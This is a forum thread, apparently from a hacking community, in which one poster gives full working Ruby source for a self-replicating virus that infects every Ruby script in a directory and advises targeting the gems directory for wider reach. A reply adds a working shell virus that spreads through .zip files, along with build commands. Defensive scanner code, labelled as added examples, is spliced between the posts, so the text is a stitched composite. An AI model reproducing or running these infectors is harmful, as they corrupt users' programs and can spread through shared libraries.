Ruby Very Basic Virus Demonstration & Methodology

Post by -Ninjex- on Tue Jan 21, 2014 12:01 pm

In computer terminology, a virus is a program that can infect other programs by embedding a (possibly better) copy of itself inside that program. What makes viruses fun to work with is their ability to spread throughout the machine and infect files at different levels of access.
For example, say a standard user downloads a '.ogv' porn video that is infected and plays the video, in turn infecting all '.ogv' files inside that user's /videos/ directory. A system administrator may be browsing through the standard user's history and notice he may have downloaded a porn video. He then goes to the user's /videos/ directory, but doesn't find the video (because the standard user deleted it). He gets curious, thinking that maybe the name was changed, so he clicks and plays a random '.ogv' video from inside the directory. This action in turn causes all '.ogv' videos inside the Administrator's /videos/ directory to become infected, essentially escalating the privileges and control the virus has.

A common falsity is that viruses are programs that are used to spread through a network. While this can be true, a virus is only considered a virus if it is actually infecting other programs, not simply spreading through the network.
The methodology is simple:
If user Fred runs virus.exe, infecting program.exe, and then Tom runs program.exe, then Tom becomes infected as well.
Another misconception is that viruses are always malicious pieces of code. This is not always true; in the example I will show you, the code is harmless, but it does qualify and fit the standards of a virus.

Before we dive into the code, let's talk about what needs to happen.
- Have something to distinguish already infected files, to prevent them from being infected again.
- Grab a program, and check if it has the distinguishing tag.
- If it does, it's already infected, so we need to grab a new file instead.
- If it does not, it has not yet been infected, so we embed the virus code inside the program.
- We need an end tag on our virus so that programs don't write their own data into other programs as well.
To pull this off, I recommend first renaming the file to be infected as tmp.ext, then writing the contents of the virus to a file with the old name, then appending the text from tmp.ext back to that file; lastly, remove the tmp.ext file. This makes sure that our virus runs first, and it makes it easier to find the distinguishing tags at the top of the file.

The code:
Code:
#0x3a
#!/usr/bin/ruby
def infect_files
  count = 0     # This will halt content reading after the virus_bottom tag
  virus_top     = '#0x3a'       # Distinguishing tag telling us if the file is infected or not
  virus_bottom  = '#:'          # Tag at the bottom of the virus to as a marker of what code to infect other programs with
  files = Dir["./**/*.rb"]      # Grab all the ruby files in the directory of the infected file.

  files.each do |random_file|   # For each ruby file in the same directory as the infected file

    first_line = File.open(random_file, &:gets).strip # Grab the first line (to check the distinguishing tag at the top)

    if first_line != virus_top  # If the program is not infected
      File.rename(random_file, 'tmp.rb') # Rename the normal file to tmp.rb
      virus_file = File.open(__FILE__, "rb") # Open infecting file for reading
      virus_contents = '' # Storing virus data until virus_bottom is hit
      # This is necessary to prevent programs from writing their own content when embedding to other programs
      virus_file.each_line do |line| # for every line in the infected file
        virus_contents += line  # Add each line to our virus content
        if line =~ /#{virus_bottom}/
          count += 1
          if count == 2 then break end # Until we hit the virus_bottom tag
        end
      end
      File.open(random_file, 'w') {|f| f.write(virus_contents) } # Write virus content to the old file's name
      good_file = File.open('tmp.rb', 'rb') # Open the tmp.rb file (contains good code) for reading
      good_contents = good_file.read # Grab the contents of the good file
      File.open(random_file, 'a') {|f| f.write(good_contents)} # Append the good content to the random file
      File.delete('tmp.rb') # Delete the temporary file
    end
  end
end

infect_files # Run the virus
#:


Simply put, this virus will take every Ruby file in the same directory as it and infect it with the same code. The code's only function is to embed itself in more programs, so therefore it's not really malicious, albeit still a virus.

Some pictures and details:
The virus: [image]

Two scripts to test, blah.rb and test.rb: [image] [image]

Infecting the files: [image]

It appears nothing happened, but let's take a look inside blah.rb's source code again: [image]

Now it is infected and is in turn a virus; let's go back to the terminal, run the program and see if it 'looks' normal: [image]

That's exactly what the code did before, minus the infecting >:}

If this file were moved into another directory, it would affect all Ruby scripts in that directory. We could also target /* files, but for Ruby specifically it would be wise to target the /var/libs/gems/**/*.rb directory, as this location holds a lot of files that get used when running Ruby programs in general.

Maybe next time I will demonstrate how this can be dangerous with escalating privileges, or demonstrate a virus that can adapt or mutate to make it more efficient. But for now, I thought this may be interesting to some, albeit very basic.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
^(-.^)>
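A defender-side counterpart to the infector above, added here as an example and not part of -Ninjex-'s post: it classifies a Ruby script as clean, suspicious (a shebang not on line 1, which any prepend-style infector leaves behind) or infected by the post's '#0x3a' marker, and strips the prepended body back to the second '#:' line, the same boundary the infector copies. The markers are the ones the post uses; the infected sample script is constructed.

```ruby
# Added example, not code from the original post: a scanner and cleaner for
# the prepend-style infection described above. Assumes the post's markers:
# '#0x3a' on line 1 and '#:' closing the virus body, host program after it.
VIRUS_TOP    = '#0x3a'
VIRUS_BOTTOM = '#:'

# Returns :infected, :suspicious or :clean for one script's text.
# :suspicious is the marker-independent signal: a shebang not on line 1.
def classify(source)
  lines = source.lines
  return :clean if lines.empty?
  return :infected if lines.first.strip == VIRUS_TOP
  shebang_at = lines.index { |l| l.start_with?('#!') }
  return :suspicious if shebang_at && shebang_at > 0
  :clean
end

# Removes the prepended virus body and returns the host program's text.
# The body ends at the second line containing '#:' (the first one is the
# virus_bottom assignment inside the virus source). nil if not infected.
def disinfect(source)
  return nil unless classify(source) == :infected
  seen = 0
  lines = source.lines
  lines.each_with_index do |line, i|
    seen += 1 if line.include?(VIRUS_BOTTOM)
    return lines.drop(i + 1).join if seen == 2
  end
  nil
end

# Constructed sample: an abridged virus body sitting on top of a one-line
# host program, the layout an infected blah.rb would have.
INFECTED_SAMPLE = <<~RUBY
  #0x3a
  #!/usr/bin/ruby
  def infect_files
    virus_bottom = '#:'   # first marker occurrence, inside the virus itself
  end
  infect_files
  #:
  puts 'hello'
RUBY

if __FILE__ == $0
  puts classify(INFECTED_SAMPLE)    # infected
  print disinfect(INFECTED_SAMPLE)  # puts 'hello'
end
```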


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by fashizzlepop on Tue Jan 21, 2014 4:28 pm

Nice post, Ninjex. Hopefully people read this before posting questions about viruses in the future.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by Goatboy on Tue Jan 21, 2014 6:42 pm

I'm glad you used an interpreted language for this. People usually associate virii with compiled languages, which is a dangerous assumption to make.
Assume that everything I say is or could be a lie.


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by tgoe on Wed Jan 22, 2014 2:29 am

Nice work :) But I have a couple of bugaboos here.
A virus is a program that can "infect" other *files* and you shouldn't ever place anything before the shebang, not even an infection marker.

-Ninjex- wrote:
The code's only function is to embed itself in more programs, so therefor it's not really malicious

Not virii but:
"Not written to cause damage"
"Just copied itself" *

-Ninjex- wrote:
demonstrate an virus that can adapt or mutate

In Ruby? I don't know Ruby. But I wanna see that.

---
* Still my fav piece of malware of all time. "The worm infected new hosts over UDP, and the entire worm (only 376 bytes) fits inside a single packet."

OT: What editor is that in the pics? Sublime? Is that a pretty Vim?


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by -Ninjex- on Wed Jan 22, 2014 6:55 am

tgoe wrote:Nice work :) But I have a couple bugaboos here.
A virus is a program that can "infect" other *files* and you shouldn't ever place anything before the shebang, not even an infection marker.

This is straight from wiki:
A computer virus is a type of malware that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".

This indicates to me that a virus 'has' to infect another file (or files) in order to gain its title as a virus.
I would also agree about the shebang; I just felt like handling the tag in a nerdy one-liner. I will be sure to change it in the next overview.
tgoe wrote:
demonstrate an virus that can adapt or mutate

In Ruby? I don't know Ruby. But I wanna see that.

OT: What editor is that in the pics? Sublime? Is that a pretty Vim?


I have plans to demonstrate the dangers of a virus and how it can possibly escalate into root privileges, and what can be done from there. After this, I will be brainstorming an adapting or mutating virus; somehow 0.o
*** Edit ***
I may have thought of a pretty nerdy way to tie both into one virus, but I'll have to test it out :D

Bingo on the text editor; I use Sublime Text 3 with the Sunburst color scheme.
Sublime is an all-time favorite GUI editor; if I work in a terminal it's usually in nano, since I haven't forced myself to constructively learn vim or vi.


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by e3cb on Mon Jan 27, 2014 9:42 am

H-hey Ninjex..... hey Ninjex! I may have some... things that could, ya know, demonstrate priv escalation and reverse connection. <3
<3 FF E4 <3
Do you even asm bruh?


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by limdis on Tue Jan 28, 2014 8:14 pm

Ninjex +1
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."


Re: Ruby Very Basic Virus Demonstration & Methodology

Post by tgoe on Wed Jan 29, 2014 1:28 pm

@ninjex

Yeah, I was trying to be more precise. Your post stated that a virus is "a program that can infect other programs" and that "a virus is only considered a virus if it is actually infecting other programs". You mention an implied '.ogv' exploit, but it should be clear that in that case the actual binary that processes the '.ogv' file needn't be infected. For example, programs that process '.zip' files can be pretty lenient on accepted input:

Code:
#!/bin/sh

# zip_virus.sh

unzip "$0"
for ZIP in `ls *\.zip`; do
    if [ "`head -1 $ZIP`" != '#/bin/sh' ]; then
        mv "$ZIP" "$ZIP.tmp";
        head -14 "$0" > "$ZIP"
        cat "$ZIP.tmp" >> "$ZIP"
        rm "$ZIP.tmp";
        chmod +x "$ZIP"
    fi
done; exit


Code:
$ cat zip_virus.sh > infected.zip; cat valid.zip >> infected.zip; chmod +x infected.zip


Try this in a directory of .zip files:
Code:
$ unzip infected.zip
$ ./infected.zip


Granted, this virus has a snowball's chance in hell without a file manager that gives the executable bit priority over the file extension... But there it is. A virus that can spread without infecting programs.

Also, I mentioned those worms because even benign malware is still malware.
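A structural check for the polyglot tgoe's script relies on, added here as an example and not part of his post: a '.zip' whose bytes begin with a shell script still unzips because zip readers locate the central directory from the end of the file, so the detector looks at both ends rather than trusting the extension. It uses the standard zip local-header and end-of-central-directory signatures, takes raw bytes and mode bits instead of reading files so it runs offline, and the archive samples are constructed.

```ruby
# Added example, not tgoe's code: a structural check for the polyglot his
# script relies on, a .zip whose bytes begin with a shell script and still
# unzip because zip readers find the central directory from the file's end.
ZIP_SIGNATURES = ["PK\x03\x04", "PK\x05\x06", "PK\x07\x08"].map(&:b)
EOCD_SIGNATURE = "PK\x05\x06".b   # end-of-central-directory record

# Classifies an archive's raw bytes plus its permission bits as
#   :archive         - zip signature up front, not executable
#   :executable_zip  - proper zip header but marked +x (odd for an archive)
#   :polyglot_script - shebang up front with a zip directory at the back
#   :not_an_archive  - neither a zip header nor a trailing zip directory
def classify_zip(bytes, mode)
  bytes = bytes.b
  executable = (mode & 0o111) != 0
  has_header = ZIP_SIGNATURES.any? { |sig| bytes.start_with?(sig) }
  has_eocd   = !bytes.rindex(EOCD_SIGNATURE).nil?
  if bytes.start_with?("#!".b) && has_eocd
    :polyglot_script
  elsif has_header && executable
    :executable_zip
  elsif has_header
    :archive
  else
    :not_an_archive
  end
end

# Constructed inputs: a minimal empty archive (an EOCD record alone) and the
# same bytes with a script prepended and +x set, as the post's recipe does.
EMPTY_ZIP    = ("PK\x05\x06" + "\x00" * 18).b
INFECTED_ZIP = "#!/bin/sh\necho polyglot\n".b + EMPTY_ZIP

if __FILE__ == $0
  puts classify_zip(EMPTY_ZIP, 0o644)     # archive
  puts classify_zip(INFECTED_ZIP, 0o755)  # polyglot_script
end
```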
